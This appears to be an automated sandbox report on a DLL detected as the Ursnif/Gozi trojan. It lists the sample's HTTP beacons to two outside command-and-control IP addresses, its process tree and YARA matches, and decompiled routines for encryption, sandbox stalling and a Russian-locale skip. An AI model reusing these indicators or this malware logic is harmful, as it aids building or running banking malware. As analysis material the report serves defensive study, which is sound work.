              1           192.168.2.6  49733        80.77.25.109    80                C:\Windows\SysWOW64\rundll32.exe
              Timestamp                            kBytes transferred  Direction  Data
              Jan 23, 2023 23:01:31.648905993 CET  343                 OUT        GET /fonts/WezqXaXzLUf7H3RvrWbfe/K3Y9YSHOHCe0ThXT/oS_2BzX_2FYO7OS/mLbIpFep6ip0wCkR_2/Fabd4fjNq/DSsjhIayoRb3vEB0gYF1/DvOBMdqirpHwq9OOdKp/l0IRYH1_2FrZtdyrRlJpVe/H42NRq5RQ81GK/VCcbxNs_/2FZJHoRNxFlaAYrUN5O5LcL/v418d_2By_/2BRt8_2Bs3hdtDQLK/oecVg251dFjL/TwR5ovb3LSr/UbFTKRYVAf_2BS/5oocK_2FZTCnj_2Bk7f5k/WVm6_2F1PqjI22z0/31vjGE0KZ/X3zQUGvA.bak HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 80.77.25.109
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 23, 2023 23:01:32.010314941 CET  344                 IN         HTTP/1.1 404 Not Found
              Server: nginx/1.18.0 (Ubuntu)
              Date: Mon, 23 Jan 2023 22:01:31 GMT
              Content-Type: text/html; charset=utf-8
              Content-Length: 548
              Connection: keep-alive
              Vary: Accept-Encoding
              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


              Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
              2           192.168.2.6  49735        170.130.165.182  80                C:\Windows\SysWOW64\rundll32.exe
              Timestamp                            kBytes transferred  Direction  Data
              Jan 23, 2023 23:02:42.232320070 CET  353                 OUT        GET /fonts/q9O3GZmMqz/vH_2FuinHCfqB7maU/gyy32Rx1oAyU/1_2B_2FdYvR/zffWIXZHaC8HuA/faDX7AnA7p_2FL2kFpu49/EdapT6mXzLN5rW1a/SHFg4AdpPfCaQnC/CaQclcnPKuVX6yIIBl/W7EdbR3h4/Baog4bkRBbEa_2Bk3PMN/6evVCCp2n5IHM6zv9Ax/6y6Xf8N9YXabol05shGVYH/wNzbR_2FsIJoL/mKWJ5fSu/iIED2oXHSZaY9qZ9s7kS1uo/kYtbGsIEzt/S4yUXjfCecHcWUBLD/uwFDVmrla6y/oLDy.bak HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 170.130.165.182
              Connection: Keep-Alive
              Cache-Control: no-cache
              Jan 23, 2023 23:02:42.828686953 CET  353                 IN         HTTP/1.1 404 Not Found
              Server: nginx/1.18.0 (Ubuntu)
              Date: Mon, 23 Jan 2023 22:02:42 GMT
              Content-Type: text/html; charset=utf-8
              Content-Length: 548
              Connection: keep-alive
              Vary: Accept-Encoding
              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->



              Target ID:0
              Start time:22:58:57
              Start date:23/01/2023
              Path:C:\Windows\System32\loaddll32.exe
              Wow64 process (32bit):true
              Commandline:loaddll32.exe "C:\Users\user\Desktop\Zeip.dll"
              Imagebase:0x1110000
              File size:116736 bytes
              MD5 hash:1F562FBF37040EC6C43C8D5EF619EA39
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:1
              Start time:22:58:57
              Start date:23/01/2023
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff6da640000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:2
              Start time:22:58:57
              Start date:23/01/2023
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Zeip.dll",#1
              Imagebase:0x1b0000
              File size:232960 bytes
              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:3
              Start time:22:58:57
              Start date:23/01/2023
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe "C:\Users\user\Desktop\Zeip.dll",#1
              Imagebase:0xc40000
              File size:61952 bytes
              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418746602.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.418746602.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.418746602.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.773492511.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000002.773492511.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000002.773492511.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418705359.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.418705359.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.418705359.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418786736.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.418786736.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.418786736.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418863496.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.418863496.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.418863496.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418642930.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.418642930.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.418642930.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.418675035.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.418675035.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.418675035.0000000005108000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
              Reputation:high

              Target ID:5
              Start time:22:58:58
              Start date:23/01/2023
              Path:C:\Windows\SysWOW64\WerFault.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 408
              Imagebase:0xde0000
              File size:434592 bytes
              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:7
              Start time:22:58:59
              Start date:23/01/2023
              Path:C:\Windows\SysWOW64\WerFault.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 416
              Imagebase:0xde0000
              File size:434592 bytes
              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:9
              Start time:22:59:02
              Start date:23/01/2023
              Path:C:\Windows\SysWOW64\WerFault.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 444
              Imagebase:0xde0000
              File size:434592 bytes
              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high


                Execution Graph

                Execution Coverage:14.4%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:46.7%
                Total number of Nodes:15
                Total number of Limit Nodes:4
                execution_graph 156 401510 157 401511 156->157 158 401559 157->158 159 401370 3 API calls 157->159 159->157 146 401511 147 401516 146->147 148 401559 147->148 150 401370 147->150 151 40138e 150->151 152 4014c7 GetBinaryTypeW 151->152 153 401443 151->153 152->153 154 40144c 152->154 153->147 155 40147b memset ReadPwrScheme 154->155 155->153 160 40156a 161 401576 GetCurrentThreadId 160->161

                Callgraph

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 21 401511-401514 22 40153b-401557 21->22 23 401516-401534 22->23 24 401559-401564 22->24 23->22 25 401539 call 401370 23->25 25->22
                C-Code - Quality: 87%
                			E00401511(void* __eax, intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
                				void* _t1;
                				intOrPtr _t2;
                				intOrPtr _t3;
                				intOrPtr _t5;
                				intOrPtr _t8;
                				intOrPtr _t9;
                				signed int _t10;
                				void* _t13;
                
                				_t9 = __esi;
                				_t8 = __edi;
                				_t5 = __ebx;
                				_t1 = __eax;
                				while(1) {
                					 *0x48e7a8 = _t5;
                					 *0x48e7a0 = _t9;
                					 *0x48e7a4 = _t8;
                					_t13 =  *0x48e7a4 - _t8; // 0x401023
                					if(_t13 != 0) {
                						break;
                					}
                					 *0x48e7b0 =  *0x48e7b0 ^ _t10;
                					_pop(_t2);
                					 *0x48e7ac = _t2;
                					 *0x48e7b0 =  *0x48e7b0 + 4;
                					_t3 =  *0x48e8d0; // 0x4024f3
                					_t1 =  *((intOrPtr*)(_t3 - 0x1183))(0); // executed
                				}
                				 *_t10 = _t1;
                				_push(_t10);
                				return _t1;
                 			}

                Memory Dump Source
                • Source File: 00000000.00000002.272718233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.272711295.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272718233.0000000000408000.00000020.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272718233.000000000040B000.00000020.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272718233.000000000040F000.00000020.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272718233.0000000000412000.00000020.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272862074.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272862074.0000000000489000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272917442.000000000048B000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272922546.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272926685.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272930095.0000000000493000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 36ba1fc2da769d0e2280fcc6d6fe17dfe378582dc41a395bc31841d3a15e0ab0
                • Instruction ID: 2e2a760b58fa734c707d093a5a678682179c551fac989b5bd1e1fe51690c4961
                • Opcode Fuzzy Hash: 36ba1fc2da769d0e2280fcc6d6fe17dfe378582dc41a395bc31841d3a15e0ab0
                • Instruction Fuzzy Hash: 8BE0C2B4A08344AFD7049F9ABC1026EB7E8F386700F445A3E95099B2A0E77594819B4D
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 26 401510 27 401511-401514 26->27 28 40153b-401557 27->28 29 401516-401534 28->29 30 401559-401564 28->30 29->28 31 401539 call 401370 29->31 31->28
                C-Code - Quality: 88%
                			E00401510(void* __eax, intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi) {
                				void* _t2;
                				intOrPtr _t3;
                				intOrPtr _t4;
                				intOrPtr _t6;
                				intOrPtr _t9;
                				intOrPtr _t10;
                				signed int _t12;
                				signed int _t15;
                				void* _t17;
                
                				_t10 = __esi;
                				_t9 = __edi;
                				_t6 = __ebx;
                				_t2 = __eax + 1;
                				_t12 = _t15;
                				while(1) {
                					 *0x48e7a8 = _t6;
                					 *0x48e7a0 = _t10;
                					 *0x48e7a4 = _t9;
                					_t17 =  *0x48e7a4 - _t9; // 0x401023
                					if(_t17 != 0) {
                						break;
                					}
                					 *0x48e7b0 =  *0x48e7b0 ^ _t12;
                					_pop(_t3);
                					 *0x48e7ac = _t3;
                					 *0x48e7b0 =  *0x48e7b0 + 4;
                					_t4 =  *0x48e8d0; // 0x4024f3
                					_t2 =  *((intOrPtr*)(_t4 - 0x1183))(0); // executed
                				}
                				 *_t12 = _t2;
                				_push(_t12);
                				return _t2;
                 			}

                Memory Dump Source
                • Source File: 00000000.00000002.272718233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.272711295.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272718233.0000000000408000.00000020.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272718233.000000000040B000.00000020.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272718233.000000000040F000.00000020.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272718233.0000000000412000.00000020.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272862074.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272862074.0000000000489000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272917442.000000000048B000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272922546.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272926685.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272930095.0000000000493000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 81abe696749345d118b84c669248143c103ea277145b9ebafeaa61ed6eeaacf1
                • Instruction ID: f906e20ab82b5ed7b070e35a117f83c689c3cc086cf9b28f8604d52bb5c8dc3a
                • Opcode Fuzzy Hash: 81abe696749345d118b84c669248143c103ea277145b9ebafeaa61ed6eeaacf1
                • Instruction Fuzzy Hash: DED09E78908708AF97158F4A7D4003AB7F9F686700B94293FA40A9B360E7719881A74D
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 401370-4013d0 call 401740 * 3 7 4013d2-40141b 0->7 8 401443-40144b 0->8 10 401421 7->10 11 4014f6-401508 7->11 12 4014c7-4014eb GetBinaryTypeW 10->12 13 401426-401438 11->13 14 40150e 11->14 15 4014f1 12->15 17 40144c-4014c5 call 4010a0 memset ReadPwrScheme 12->17 13->15 16 40143e 13->16 14->12 15->8 16->12 17->15
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.272718233.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.272711295.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272718233.0000000000408000.00000020.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272718233.000000000040B000.00000020.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272718233.000000000040F000.00000020.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272718233.0000000000412000.00000020.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272862074.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272862074.0000000000489000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272917442.000000000048B000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272922546.000000000048E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272926685.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.272930095.0000000000493000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                Similarity
                • API ID: BinaryReadSchemeTypememset
                • String ID:
                • API String ID: 3942391067-0
                • Opcode ID: 22b2b1adae6d8a581a5f2027df6d90117b2150713a6324f1de15750c2bef46a1
                • Instruction ID: c8fa2d138a66364d72711ac360665275a51d0ccfd93b427d6f255f79c7e3c33c
                • Opcode Fuzzy Hash: 22b2b1adae6d8a581a5f2027df6d90117b2150713a6324f1de15750c2bef46a1
                • Instruction Fuzzy Hash: 4341BB746147008FC324EF39C541262BBE1AF49714F504A7EE48A9BBE1D73AF805CB8A
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 50%
                			E04B96EB4(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                				int _v8;
                				long* _v12;
                				int _v16;
                				void* _v20;
                				long* _v24;
                				void* _v39;
                				char _v40;
                				void _v56;
                				int _v60;
                				intOrPtr _v64;
                				void _v67;
                				char _v68;
                				void* _t61;
                				int _t68;
                				signed int _t76;
                				int _t79;
                				int _t81;
                				void* _t85;
                				long _t86;
                				int _t90;
                				signed int _t94;
                				int _t101;
                				void* _t102;
                				int _t103;
                				void* _t104;
                				void* _t105;
                				void* _t106;
                
                				_t103 = __eax;
                				_t94 = 6;
                				_v68 = 0;
                				memset( &_v67, 0, _t94 << 2);
                				_t105 = _t104 + 0xc;
                				asm("stosw");
                				asm("stosb");
                				_v40 = 0;
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				asm("stosw");
                				asm("stosb");
                				_t61 =  *0x4b9a0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                				if(_t61 == 0) {
                					_a8 = GetLastError();
                				} else {
                					_t101 = 0x10;
                					memcpy( &_v56, _a8, _t101);
                					_t106 = _t105 + 0xc;
                					_v60 = _t101;
                					_v67 = 2;
                					_v64 = 0x660e;
                					_v68 = 8;
                					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
                					if(_t68 == 0) {
                						_a8 = GetLastError();
                					} else {
                						_push(0);
                						_push( &_v40);
                						_push(1);
                						_push(_v12);
                						if( *0x4b9a0e4() == 0) {
                							_a8 = GetLastError();
                						} else {
                							_t18 = _t103 + 0xf; // 0x10
                							_t76 = _t18 & 0xfffffff0;
                							if(_a4 != 0 && _t76 == _t103) {
                								_t76 = _t76 + _t101;
                							}
                							_t102 = E04B96601(_t76);
                							_v20 = _t102;
                							if(_t102 == 0) {
                								_a8 = 8;
                							} else {
                								_v16 = 0;
                								_a8 = 0;
                								while(1) {
                									_t79 = 0x10;
                									_v8 = _t79;
                									if(_t103 <= _t79) {
                										_v8 = _t103;
                									}
                									memcpy(_t102, _a12, _v8);
                									_t81 = _v8;
                									_a12 = _a12 + _t81;
                									_t103 = _t103 - _t81;
                									_t106 = _t106 + 0xc;
                									if(_a4 == 0) {
                										_t85 =  *0x4b9a0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                									} else {
                										_t85 =  *0x4b9a0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
                									}
                									if(_t85 == 0) {
                										break;
                									}
                									_t90 = _v8;
                									_v16 = _v16 + _t90;
                									_t102 = _t102 + _t90;
                									if(_t103 != 0) {
                										continue;
                									} else {
                										L17:
                										 *_a16 = _v20;
                										 *_a20 = _v16;
                									}
                									goto L21;
                								}
                								_t86 = GetLastError();
                								_a8 = _t86;
                								if(_t86 != 0) {
                									E04B94130(_v20);
                								} else {
                									goto L17;
                								}
                							}
                						}
                						L21:
                						CryptDestroyKey(_v12);
                					}
                					CryptReleaseContext(_v24, 0);
                				}
                				return _a8;
                 			}

                APIs
                • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,04B95335,00000001,04B96DDD,00000000), ref: 04B96EEC
                • memcpy.NTDLL(04B95335,04B96DDD,00000010,?,?,?,04B95335,00000001,04B96DDD,00000000,?,04B95DEE,00000000,04B96DDD,?,76B5C740), ref: 04B96F05
                • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 04B96F2E
                • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 04B96F46
                • memcpy.NTDLL(00000000,76B5C740,05109600,00000010), ref: 04B96F98
                • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,05109600,00000020,?,?,00000010), ref: 04B96FC1
                • GetLastError.KERNEL32(?,?,00000010), ref: 04B96FF0
                • GetLastError.KERNEL32 ref: 04B97022
                • CryptDestroyKey.ADVAPI32(00000000), ref: 04B9702E
                • GetLastError.KERNEL32 ref: 04B97036
                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04B97043
                • GetLastError.KERNEL32(?,?,?,04B95335,00000001,04B96DDD,00000000,?,04B95DEE,00000000,04B96DDD,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B9704B
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
                • String ID: @MetNet
                • API String ID: 3401600162-2109406137
                • Opcode ID: 766dfb1c513a3721262bd5f2504cb56a6e558b8c018baadb0dd0beb2723f7bd5
                • Instruction ID: b93374accf56e10c3740f8c54ffd84545f48a49dbf224f2f04374cd6a59dfa48
                • Opcode Fuzzy Hash: 766dfb1c513a3721262bd5f2504cb56a6e558b8c018baadb0dd0beb2723f7bd5
                • Instruction Fuzzy Hash: 21513BB1900248FFDF109FB5D984AAE7BF9EB08340F10847AF915E7240EB35AE149B61
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 135 401c21-401c31 call 401ba8 138 401c37-401c39 135->138 139 401d9e-401d9f 135->139 140 401c3a-401c41 138->140 141 401c42-401c4c call 401634 140->141 144 401c83 141->144 145 401c4e-401c69 NtQuerySystemInformation 141->145 146 401c8a-401c8e 144->146 147 401c6b 145->147 148 401c6e-401c81 call 401b8c 145->148 146->141 149 401c90-401ca9 call 401664 Sleep 146->149 147->148 148->146 149->140 154 401cab-401caf 149->154 155 401cb5-401ccd GetLocaleInfoA 154->155 156 401d9b-401d9d 154->156 157 401ce7-401cf0 155->157 158 401ccf-401ce2 GetSystemDefaultUILanguage VerLanguageNameA 155->158 156->139 159 401cf6-401cf9 157->159 160 401d8d-401d93 157->160 158->157 162 401d4a-401d5e call 401234 159->162 163 401cfb-401d06 call 401da8 159->163 160->156 161 401d95 160->161 161->156 168 401d60-401d6e WaitForSingleObject 162->168 169 401d84-401d8a 162->169 170 401d44 163->170 171 401d08-401d1a GetLongPathNameW 163->171 172 401d70-401d74 168->172 173 401d7b-401d82 CloseHandle 168->173 169->160 170->162 174 401d3c-401d42 171->174 175 401d1c-401d2d call 401634 171->175 172->173 173->160 174->162 175->174 179 401d2f-401d35 GetLongPathNameW call 401b8c 175->179 181 401d3a 179->181 181->162
                C-Code - Quality: 79%
                			E00401C21(char _a4) {
                				long _v8;
                				char _v12;
                				char _v36;
                				long _t29;
                				long _t31;
                				long _t32;
                				signed short _t34;
                				long _t39;
                				void* _t45;
                				intOrPtr _t47;
                				signed int _t54;
                				signed int _t55;
                				long _t60;
                				intOrPtr _t62;
                				void* _t67;
                				void* _t69;
                				signed int _t71;
                				signed int _t72;
                				void* _t76;
                				intOrPtr* _t77;
                
                				_t29 = E00401BA8();
                				_v8 = _t29;
                				if(_t29 != 0) {
                					return _t29;
                				} else {
                					do {
                						_t71 = 0;
                						_v12 = 0;
                						_t60 = 0x30;
                						do {
                							_t67 = E00401634(_t60);
                							if(_t67 == 0) {
                								_v8 = 8;
                							} else {
                								_t54 = NtQuerySystemInformation(8, _t67, _t60,  &_v12); // executed
                								_t63 = _t54;
                								_t55 = _t54 & 0x0000ffff;
                								_v8 = _t55;
                								if(_t55 == 4) {
                									_t60 = _t60 + 0x30;
                								}
                								_t72 = 0x13;
                								_t10 = _t63 + 1; // 0x1
                								_t71 =  *_t67 % _t72 + _t10;
                								E00401B8C(_t67);
                							}
                						} while (_v8 != 0);
                						_t31 = E00401664(_t71); // executed
                						_v8 = _t31;
                						Sleep(_t71 << 4); // executed
                						_t32 = _v8;
                					} while (_t32 == 0x15);
                					if(_t32 != 0) {
                						L28:
                						return _t32;
                					}
                					_v12 = 0;
                					_t34 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4);
                					if(_t34 == 0) {
                						__imp__GetSystemDefaultUILanguage();
                						_t63 =  &_v12;
                						VerLanguageNameA(_t34 & 0xffff,  &_v12, 4);
                					}
                					if(_v12 == 0x5552) {
                						L26:
                						_t32 = _v8;
                						if(_t32 == 0xffffffff) {
                							_t32 = GetLastError();
                						}
                						goto L28;
                					} else {
                						if(_a4 != 0) {
                							L21:
                							_push(0);
                							_t76 = E00401234(E00401490,  &_v36);
                							if(_t76 == 0) {
                								_v8 = GetLastError();
                							} else {
                								_t39 = WaitForSingleObject(_t76, 0xffffffff);
                								_v8 = _t39;
                								if(_t39 == 0) {
                									GetExitCodeThread(_t76,  &_v8);
                								}
                								CloseHandle(_t76);
                							}
                							goto L26;
                						}
                						if(E00401DA8(_t63,  &_a4) != 0) {
                							 *0x4041b8 = 0;
                							goto L21;
                						}
                						_t62 = _a4;
                						_t77 = __imp__GetLongPathNameW;
                						_t45 =  *_t77(_t62, 0, 0); // executed
                						_t69 = _t45;
                						if(_t69 == 0) {
                							L19:
                							 *0x4041b8 = _t62;
                							goto L21;
                						}
                						_t23 = _t69 + 2; // 0x2
                						_t47 = E00401634(_t69 + _t23);
                						 *0x4041b8 = _t47;
                						if(_t47 == 0) {
                							goto L19;
                						}
